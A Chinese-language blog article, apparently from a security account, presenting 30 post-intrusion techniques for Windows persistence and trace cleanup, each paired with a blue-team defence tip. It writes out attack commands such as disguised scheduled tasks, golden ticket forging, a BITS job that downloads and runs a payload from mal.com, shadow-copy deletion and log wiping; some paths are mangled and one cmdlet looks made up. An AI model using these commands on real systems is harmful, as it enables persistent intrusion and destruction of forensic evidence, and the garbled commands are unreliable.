内网渗透后，别光想着跑路，这30个擦屁股姿势，你真的懂？

内网攻防，说白了就是一场猫鼠游戏。进了内网，拿了权限，别以为就万事大吉。真正的较量，才刚刚开始。权限维持是扎根，痕迹清理是隐身。做不好这两点，等着你的，就是被蓝队按在地上摩擦。今天，咱就来聊聊这30个“擦屁股”的绝活，看看你到底漏了哪一招，以及如何防着点儿。

第一部分：权限维持？没点“骚操作”怎么行！15种姿势，让你在内网“苟”得更久

1. 计划任务？别玩“皇帝的新衣”，伪装才是王道！

• 黑客心法：schtasks这玩意儿，谁都会用。但要玩出花，得学会伪装。把你的恶意程序，藏在MicrosoftEdgeUpdate这种系统服务的“马甲”里，让它定时出来溜达溜达。

  schtasks /create /tn "MicrosoftEdgeUpdate" /tr "C:malware.exe" /sc hourly

• 蓝队视角：别光盯着任务名称，看看那些非微软签名的程序路径，才是重点！

1. 服务注入？别硬刚，学会“借刀杀人”！

• 黑客心法：Print Spooler这种老牌服务，谁还没研究过？把它的“二进制路径”指向你的恶意DLL，让它帮你执行代码。

  sc config spooler binPath= "C:WindowsSystem32mal.dll"

• 蓝队视角：启用服务签名验证，让那些“野路子”DLL无处遁形！RequireSignedServiceBinaries，安排！

1. 注册表自启动？别玩“裸奔”，藏好你的“小秘密”！

• 黑客心法：HKCUSoftwareMicrosoftWindowsCurrentVersionRun，这是兵家必争之地。但要玩得隐蔽，得用CLSID这种“暗号”来混淆键名。

• 蓝队视角：注册表变更告警，必须安排上！任何风吹草动，都要第一时间知道！

1. 启动文件夹？别直接塞，用“糖衣炮弹”！

• 黑客心法：%AppData%MicrosoftWindowsStart MenuProgramsStartup，把恶意快捷方式扔进去，简单粗暴？NONONO，用.url文件伪装成合法文档，才是高手的选择。

• 蓝队视角：限制用户目录写入权限，让攻击者无从下手。

1. WMI事件订阅？别只会“触发”，玩转“事件风暴”！

• 黑客心法：WMI事件过滤器，简直是为持久化量身定做的。用户登录？系统启动？任何事件，都可以成为你后门的触发器。

  powershell $filterArgs = @{ EventNamespace='rootcimv2'; QueryLanguage='WQL'; Query="SELECT * FROM __InstanceCreationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_LogonSession'" } $consumerArgs = @{ Name='MalConsumer'; [ScriptingEngine]='JScript'; ScriptText='...' }

• 蓝队视角：定期审计__EventFilter/__EventConsumer类，揪出那些“偷偷摸摸”的订阅者。

1. 影子账户？别只想着“隐藏”，玩转“身份互换”！

• 黑客心法：通过注册表添加隐藏账户，F值修改为0x3e9，让它在你的眼皮底下溜达。

  reg add "HKLMSAMSAMDomainsAccountUsers003E9" /v F /t REG_BINARY /d ...

• 蓝队视角：检查SAM中用户RID是否连续，揪出那些“冒牌货”。

1. 黄金票据？别只想着“伪造”，玩转“ Kerberos ”！

• 黑客心法：拿到域控的KRBTGT哈希，就能伪造TGT票据，畅游整个域。

  kerberos::golden /user:Administrator /domain:contoso.com /sid:S-1-5-21-... /krbtgt:hash /ptt

• 蓝队视角：定期重置KRBTGT密码，让攻击者的“金钥匙”失效。每180天一次，别偷懒！

1. ACL后门？别只想着“权限”，玩转“访问控制”！

• 黑客心法：给关键进程（如LSASS.exe）添加调试权限，就能为所欲为。

  Set-ProcessSecurityDescriptor-Name lsass -Right GenericAll -Allow

• 蓝队视角：监控敏感进程的ACL变更，揪出那些“不速之客”。

1. DLL劫持？别只想着“替换”，玩转“搜索顺序”！

• 黑客心法：替换系统目录（如C:WindowsSystem32）中未签名的DLL，利用DLL搜索顺序劫持应用程序。

• 蓝队视角：启用DLL签名强制验证（CIG功能），让那些“野路子”DLL无处遁形。

1. RID劫持攻击？别只想着“提权”，玩转“身份冒充”！

• 黑客心法：修改低权限用户的RID为500（管理员RID），瞬间变身“管理员”。

• 蓝队视角：检查用户SID与RID的合法性，揪出那些“冒牌货”。

1. COM劫持？别只想着“注册”，玩转“组件复用”！

• 黑客心法：注册恶意COM组件劫持MMC或Office调用链，让你的代码在不经意间执行。

  HKCRCLSID{...}InprocServer32

• 蓝队视角：禁用未签名的COM组件加载，让那些“野路子”组件无处遁形。

1. Hook注入（API Hooking）？别只想着“注入”，玩转“流量劫持”！

• 黑客心法：注入WS2_32.dll的connect函数，实现网络通信重定向，截获敏感信息。

• 蓝队视角：启用驱动签名验证（DSE），让那些“非法”驱动无法加载。

1. Bits Jobs持久化？别只想着“下载”，玩转“后台传输”！

• 黑客心法：利用后台智能传输服务（BITS）下载恶意负载，神不知鬼不觉。

  powershell bitsadmin /create backdoor bitsadmin /addfile backdoor http://mal.com/payload.exe C:empsvchost.exe bitsadmin /SetNotifyCmdLine backdoor C:empsvchost.exe NULL

• 蓝队视角：审核BITS任务列表，揪出那些“偷偷摸摸”的下载任务。

1. 域信任关系滥用？别只想着“信任”，玩转“跨域提权”！

• 黑客心法：在跨域信任场景中利用SID History属性提权，横行霸道。

• 蓝队视角：禁用不必要的域信任关系，避免“引狼入室”。

1. Office宏持久化？别只想着“嵌入”，玩转“自动执行”！

• 黑客心法：在Normal.dotm模板中嵌入恶意宏代码，用户启动Word时自动执行。

• 蓝队视角：启用宏执行限制（仅允许签名宏），让那些“非法”宏无法运行。

第二部分：痕迹清理？这才是真正的技术活！15个“擦屁股”姿势，让你走得悄无声息

1. Windows事件日志清除？别只会“删除”，玩转“内存擦除”！

• 黑客心法：wevtutil cl Security，谁都会用。但要玩得高级，得用内存注入技术直接操作eventlog.service进程。

• 蓝队视角：启用日志转发至SIEM系统，本地日志被删了，云端还有备份。

1. IIS日志擦除？别“一刀切”，玩转“精准删除”！

• 黑客心法：C:inetpublogsLogFilesW3SVC1，找到日志路径，只删除特定时间段的日志条目，避免全量删除引发怀疑。

• 蓝队视角：配置日志文件ACL为只读，让攻击者无法篡改。

1. 防火墙规则恢复？别“明着删”，玩转“暗度陈仓”！

• 黑客心法：删除新增的放行规则，复用已有规则名称（如Remote Desktop），让你的规则看起来像“自己人”。

  netsh advfirewall firewall delete rule name="mal_rule"

• 蓝队视角：基线化防火墙规则并监控变更，任何“异常”都要第一时间发现。

1. 文件时间戳伪造？别“乱改”，玩转“以假乱真”！

• 黑客心法：timestomp.exe -m "01/01/2020 08:00:00" malware.exe，将时间戳与系统文件（如notepad.exe）保持一致，让你的文件看起来像“原生”的。

• 蓝队视角：启用文件完整性监控（FIM），任何文件属性的变更都要记录在案。

1. 内存痕迹清除？别“硬来”，玩转“无文件擦除”！

• 黑客心法：卸载恶意驱动后调用ExAllocatePool覆盖内存区域，或者使用BOF（Beacon Object Files）实现无文件擦除，不留痕迹。

• 蓝队视角：部署内存扫描工具（如Elastic Endpoint），定期扫描内存中的“可疑”区域。

1. 回收站绕过删除？别“留情”，玩转“彻底清除”！

• 黑客心法：del /f /q /s *.*配合shift+delete彻底清除，再用cipher /w:C:覆写磁盘空闲空间，让数据无法恢复。

• 蓝队视角：审计敏感目录的文件删除操作，任何“异常”都要记录在案。

1. 预读取文件清理？别“放过”，玩转“细节控”！

• 黑客心法：C:WindowsPrefetch中.pf文件，记录了程序运行的痕迹，定期执行del /f /q C:WindowsPrefetch*.pf，清理痕迹。

• 蓝队视角：禁用预读取功能，虽然会影响性能，但安全性更高。

1. 卷影副本删除？别“犹豫”，玩转“先下手为强”！

• 黑客心法：vssadmin delete shadows /all /quiet，提权后第一时间删除卷影副本，防止取证恢复。

• 蓝队视角：限制vssadmin执行权限，避免被滥用。

1. RDP连接记录清除？别“手敲”，玩转“自动化”！

• 黑客心法：HKCUSoftwareMicrosoftTerminal Server ClientServers，编写脚本批量删除历史IP记录，告别“手动删除”。

• 蓝队视角：启用RDP连接日志审计，记录每一次连接的IP地址。

1. 浏览器历史痕迹清理？别“留情”，玩转“自动化”！

• 黑客心法：使用BrowsingHistoryView导出并删除Chrome/Firefox记录，或者劫持浏览器扩展自动清理历史，让你的浏览记录无处可寻。

• 蓝队视角：监控浏览器进程的异常行为，揪出那些“偷偷摸摸”清理历史的进程。

1. PowerShell日志绕过？别“大意”，玩转“隐身模式”！

• 黑客心法：-WindowStyle Hidden -ExecutionPolicy Bypass隐藏执行窗口，删除Microsoft-Windows-PowerShell%4Operational.evtx，清理日志。

• 蓝队视角：启用模块日志记录（ScriptBlockLogging），记录每一条PowerShell命令。

1. WMI日志清理？别“怕麻烦”，玩转“服务停止”！

• 黑客心法：停止Winmgmt服务后操作日志文件，清理WMI日志。

• 蓝队视角：启用WMI活动审计策略，记录每一次WMI操作。

1. Linux utmp/wtmp清理？别“忘记”，玩转“登录记录”！

• 黑客心法：使用utmpdump工具编辑登录记录，清理/var/run/utmp、/var/log/wtmp，抹去登录痕迹。

• 蓝队视角：配置ttylog实时记录会话内容，即使登录记录被篡改，也能还原真相。

1. 数据库日志截断？别“手软”，玩转“日志循环”！

• MySQL：PURGE BINARY LOGS BEFORE '2024-01-01';

• MSSQL：执行EXEC sp_cycle_errorlog;循环日志文件。

• 蓝队视角：启用数据库审计并异地存储日志，确保日志的完整性和可用性。

1. 云平台日志覆盖？别“侥幸”，玩转“权限控制”！

• AWS：通过DeleteLogGroup删除CloudTrail日志组。

• Azure：使用Remove-AzLogProfile清除活动日志配置。

• 蓝队视角：启用云日志不可变性（Immutable Storage），确保日志无法被篡改或删除。

防御方？别光看热闹，这些才是“干货”！

• 权限维持检测：部署EDR监控进程树异常、注册表关键路径变更及服务签名异常，任何“异常”都要第一时间发现。

• 痕迹清理对抗：实施日志多副本存储（本地+云端+物理设备），使用AI分析日志完整性，确保日志的完整性和可用性。

• 红队验证：定期模拟攻击验证防御体系有效性，重点关注上述30项技术的防护盲区，不断提升防御能力。

看到这里，你是不是觉得自己又学到了很多？别忘了，点个赞、在看、转发三连，支持一下！想第一时间收到推送？给我个星标⭐吧！我们，下次再见！
 ```

黑客/